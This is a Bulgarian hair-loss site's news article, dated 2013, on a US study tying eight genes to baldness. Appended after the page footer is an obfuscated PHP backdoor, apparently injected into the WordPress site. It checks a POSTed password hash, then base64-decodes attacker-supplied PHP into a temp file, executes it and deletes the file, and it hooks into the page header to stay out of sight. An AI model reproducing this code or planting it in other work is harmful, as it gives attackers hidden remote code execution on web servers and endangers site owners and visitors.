8 гена водят до косопад и оплешивяване | Косопад

8 гена предизвикват оплешивяване

Оплешивяване

Оплешивяване

Последните изследвания на учени от Университета в Ню Йорк разкриха, че осем човешки гена предизвикват косопад и оплешивяване. Изследването е проведено сред почти 5 000 американци, от които около 30 % имат проблеми с косата.

Проучването установява, че в космените фоликули на хората с оплешивяване се съдържат големи количества от гена ULBP3, който по принцип не трябва да е наличен на това място от човешкото тяло. Експертите предполагат, че е вследствие на увреждане в имунната система, която по собствено усмотрение унищожава необходимите за нормалното състояние на косата протеини и това води до косопад.

Става ясно още, че оплешивяването се появява от още два гена във фоликулите, които не би следвало да са там – STX17 и PRDX5. Забелязани са още пет гена, които предизвикват имунната система на организма да стопира растежа на космите.

Ръководителят на изследователския екип д-р Кристиана уточнява, че начинът по който гените увреждат космените фоликули и водят до оплешивяване, отдавна е установен. Причина за това е непредвидима мутация на APCDD1, чрез която се блокира почти напълно синтеза на протеините, отговарящи не само за растежа на косата, но и за правилното функциониране на други важни органи.

Според официалните данни, в световен мащаб от типичното за мъжете генетично оплешивяване страда около 2 % от населението. Само в САЩ, хората с косопад от генетични изменения са повече от 5. 4 милиона души. Д-р Кристиана се надява, че новите изследвания ще спомогнат за създаването на силни средства, които да спомогнат за решаване на този проблем.

косопад и оплешивяване

Типични фази на косопад и оплешивяване

27. април 2013 18:29:17 от Косопад
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}